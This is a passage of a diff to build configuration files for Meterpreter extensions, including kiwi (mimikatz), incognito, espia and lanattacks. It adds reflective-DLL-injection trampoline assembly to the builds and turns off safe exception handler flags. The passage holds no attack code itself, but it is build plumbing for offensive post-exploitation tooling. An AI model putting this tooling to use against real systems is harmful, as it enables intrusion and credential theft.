"$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </PostBuildEvent> </ItemDefinitionGroup> 
@@ -400,10 +416,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)"</Command> </PostBuildEvent> </ItemDefinitionGroup> @@ -459,10 +476,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </PostBuildEvent> </ItemDefinitionGroup> diff --git a/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt b/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt index 01de6126a..a89824aee 100644 --- a/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt 
@@ -29,7 +29,7 @@ if(MSVC) endif() set(LINK_LIBS jpeg) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj index 4065c24c6..f4ac0d194 100644 --- a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj +++ b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj @@ -159,6 +159,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -216,6 +217,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -272,6 +274,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -328,6 +331,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -385,6 +389,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -441,6 +446,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -457,6 +463,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\espia\espia.h" /> <ClInclude Include="..\..\source\extensions\espia\screen.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -464,4 +482,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt index d1f4efd06..cd6b8f713 100644 --- a/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt @@ -43,7 +43,7 @@ if(MSVC) else() endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() 
diff --git a/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj b/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj index 33891ee83..ef46e556d 100644 --- a/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj +++ b/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj @@ -152,6 +152,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -316,6 +319,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -372,6 +376,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -427,6 +432,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -469,6 +475,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\extapi\wmi_interface.h" /> <ClInclude Include="..\..\source\extensions\extapi\wshelpers.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -476,4 +494,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt b/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt index 6ad783b10..450af691a 100644 --- a/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt @@ -30,7 +30,7 @@ if(MSVC) endif() set(LINK_LIBS netapi32 mpr) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() 
diff --git a/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj b/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj index 18a5b22cd..bee876bdc 100644 --- a/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj +++ b/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj @@ -157,6 +157,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -212,6 +213,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -266,6 +268,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -324,6 +327,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -383,6 +387,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -441,6 +446,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -466,8 +472,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\incognito\token_info.h" /> <ClInclude Include="..\..\source\extensions\incognito\user_management.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt index 972c18ba0..89d17f39f 100644 --- a/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt @@ -46,6 +46,10 @@ else() '-D__success=DISCARD' '-D__FUNCTION__=""' '-D__struct_bcount=DISCARD' + '-D__nullterminated=SAL__nullterminated' + '-D__in_range=__RPC__in_range' + '-D__callback=SAL__callback' + '-D__deref_in_bcount_opt=SAL__deref_in_bcount_opt' ) endif() 
@@ -136,7 +140,7 @@ set(LINK_LIBS ${KIWI_LIB_DIR}/bcrypt.lib ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj index e3e5b0abe..ea63cc195 100644 --- a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj +++ b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj @@ -192,6 +192,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -249,6 +250,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -305,6 +307,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -365,6 +368,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -426,6 +430,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -486,6 +491,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -745,6 +751,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\rpc\kull_m_rpc_ms-rprn.h" />
 <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sqlite3.h" />
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+ </MASM>
+ </ItemGroup>
 <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
diff --git a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters
index c17462c4f..3edf88046 100644
--- a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters
+++ b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters
@@ -712,4 +712,8 @@ <UniqueIdentifier>{fdb3471d-bb0a-4de4-95ff-f4f343270ebd}</UniqueIdentifier> </Filter> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm" /> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm" /> + </ItemGroup> </Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt b/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt index b8ff489fa..8e79919c9 100644 --- a/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt @@ -37,7 +37,7 @@ set(LINK_LIBS ws2_32 ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") else() diff --git a/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj b/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj index 3490dc0ed..3ccfe362e 100644 --- a/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj +++ b/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj @@ -146,6 +146,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -193,6 +194,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -239,6 +241,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -293,6 +296,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -348,6 +352,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
